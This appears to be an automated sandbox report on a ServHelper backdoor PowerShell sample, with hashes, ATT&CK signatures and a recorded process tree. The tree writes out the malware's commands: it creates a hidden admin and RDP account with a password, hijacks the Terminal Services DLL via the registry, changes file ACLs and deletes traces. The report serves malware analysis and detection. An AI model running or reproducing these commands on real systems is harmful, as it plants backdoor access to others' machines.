Analysis
-
max time kernel
121s -
max time network
96s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
-
submitted
21-09-2024 00:11
General
-
Target
eeb519eaefb64bc433463231d840bf14_JaffaCakes118.ps1
-
Size
3.0MB
-
MD5
eeb519eaefb64bc433463231d840bf14
-
SHA1
5139f70546eabb86a7d2ba5529037d8ee28b7e3d
-
SHA256
ed41bd0246b8f3ff6ed065d29c2dd8507d106fb5186e0ceb0bebc6339e5375b8
-
SHA512
ed60dfc4a3d0772a9610e1e457a1bc60101f12c54d9c2cd772e23a242852e4ffb5b489c722b958662309bc2c4d047d6566ab92383700ee9b785d22cb1e246254
-
SSDEEP
49152:l6LEUa87XCQc/UKPJ6F+j7zH6FygD35+rgo2Oo1q:B
Malware Config
Signatures
-
ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
-
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.
-
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
-
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
-
Modifies RDP port number used by Windows 1 TTPs
-
Possible privilege escalation attempt 8 IoCs
-
Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
-
Deletes itself 1 IoCs
-
Loads dropped DLL 2 IoCs
-
Modifies file permissions 1 TTPs 8 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
-
Drops file in System32 directory 1 IoCs
-
Drops file in Windows directory 8 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
-
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
-
Modifies registry key 1 TTPs 1 IoCs
-
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\eeb519eaefb64bc433463231d840bf14_JaffaCakes118.ps11⤵
- Deletes itself
- Drops file in System32 directory
- Drops file in Windows directory
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\izma0pym\izma0pym.cmdline"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES805B.tmp" "c:\Users\Admin\AppData\Local\Temp\izma0pym\CSCF3EED24F13704FB39FDCD6CD9B9E7428.TMP"3⤵
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\takeown.exe"C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\icacls.exe"C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX2⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f2⤵
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f2⤵
- Server Software Component: Terminal Services DLL
- Modifies registry key
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f2⤵
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start rdpdr3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start rdpdr4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr5⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd /c net start TermService3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet start TermService4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService5⤵
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f2⤵
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f2⤵
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Indicator Removal: Network Share Connection Removal
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵
- Indicator Removal: Network Share Connection Removal
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc uADdk8A5 /add1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc uADdk8A5 /add2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc uADdk8A5 /add3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵
- Remote Service Session Hijacking: RDP Hijacking
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵
- Remote Service Session Hijacking: RDP Hijacking
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" ZEUYFSYD$ /ADD1⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" ZEUYFSYD$ /ADD2⤵
- Remote Service Session Hijacking: RDP Hijacking
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" ZEUYFSYD$ /ADD3⤵
- Remote Service Session Hijacking: RDP Hijacking
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc uADdk8A51⤵
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc uADdk8A52⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc uADdk8A53⤵
-
-
Network
MITRE ATT&CK Enterprise v15
Persistence
Account Manipulation
1Server Software Component
1Terminal Services DLL
1Defense Evasion
File and Directory Permissions Modification
1Indicator Removal
2File Deletion
1Network Share Connection Removal
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5642db8f9b0151d2920fcb4de4c4d46d0
SHA1246a8a5dec4cf7ca1b501e49f15bcdf2588fe6ac
SHA256106bc43b061ae02e7f22332aff6db71206cf2545d7798c325d23686c9b9356fd
SHA512003b7a25d383e0d83207eebc733fe774252f714e7b27d39074e2912ed6fad97e718da2bd83994e9866f23e0b28435511d3429de2d22116b7d4dc3c8c08767fa9
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3KB
MD59c62cba5c0a7c4397301ac96b7b0244e
SHA10a0aa39a9471afab4791a3b5abe93bda5f7314ac
SHA2568c36b348af8c6feaf010a159efc3e8159e1226a3848e1a08eab88d37737f4c68
SHA512315a6fbc6da5dbc1f0659933e3c7262e7e5d3943cd8d5fb13aac7057dd0e78fa403c3d3b35411c4653cd9da3ad0188752a92b463599b402b5769c2bb32cfe8c9
-
Filesize
55KB
MD51ab040e0018dfe00c298cff9650b4036
SHA1efbf4905aa5e3165c61b06a4ea15049802873e18
SHA256fc84cef1220db7f3605dc8eb75a4737ceb5a188dc96c47f62c4522206729982f
SHA512bc261e2901319015bc5c48bef58d83d2d960b89185d49f771646ec01924d93cfb28580810fa767d05d713164e9831011d01a1220d4fac41edb6bcb3f7c0b77e0
-
Filesize
945KB
MD53125db7cf3000e6336743773ccadb45e
SHA1af10135f9b4143997b8d1c4ccf55dee64d745061
SHA2566dd90fbc06b03d73a9bde2a343540993fefb7b7123483922defc0272cf6ee05c
SHA5120b686203b54f8fe46e2cee7d3b3c063b582386a04fd79bc5ce5a3b5582018f15db3d405e70a9ca055ab88f8aecebc3902a6d49a80dbb2ded372310d1a80d9210
-
Filesize
40KB
MD5dc39d23e4c0e681fad7a3e1342a2843c
SHA158fd7d50c2dca464a128f5e0435d6f0515e62073
SHA2566d9a41a03a3bd5362e3af24f97ba99d2f9927d1375e4f608942a712866d133b9
SHA5125cb75e04ce9f5c3714e30c4fd5b8dbcd3952c3d756556dd76206111fe5b4e980c6c50209ab0914ab3afe15bd9c33ff0d49463ca11547214122859918de2a58f7
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
652B
MD567d213593daeea9e1f46807a98ed34af
SHA1b702b5d5fddb6c474519acba4456863bbdad1f86
SHA2562704ad6d93b3d142d365ae60f3b8be7e35bd3c89063b36a042f39c4816864ab2
SHA512a46c1a936bf0aa9dbb8e01b7adc98c34b5744a106cfc999fa8bbcd341cba747ed7c4e2d2994e1c88dee365c22745500d470942b068b847788d184859a110bac6
-
Filesize
504B
MD58e55cb0ca998472ab6d3e295e0c4dd50
SHA1407d07a29b89fc3afc246c0680d5857e3f51019d
SHA25663e03eacae29a0d2187103f57a01a5e92ecb3b83a0452e05926303ab57a86685
SHA512c51982ecdad9a366544cfb68a52808f6a54ed45c1e5b384c0ac5354fe713c18a16c90ee57e0d018caad02f7f293677c62f4c8a9a51bdea143f3afe593172bd28
-
Filesize
369B
MD5f317f76d0421440319d2175ca59df567
SHA14864f0afd294e929d884be30daacc866b4e75b5c
SHA256dbcd047ee31f399aae194912035e764dbbf266dcab84677f28ae80373826c65d
SHA51211fae7f6f3677219c503739d2ea89542b00a8f75e24f8a0f6d7385204ede59e5399af730f9c04d14841004f8ce06c2c8fdc55a1e79f6ef7e1558d73ab4a0d5da
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
2.0MB
-
Filesize
10.8MB
-
Filesize
1.5MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
8KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
32KB
-
Filesize
10.8MB
-
Filesize
10.8MB
-
Filesize
136KB
-
Filesize
10.8MB
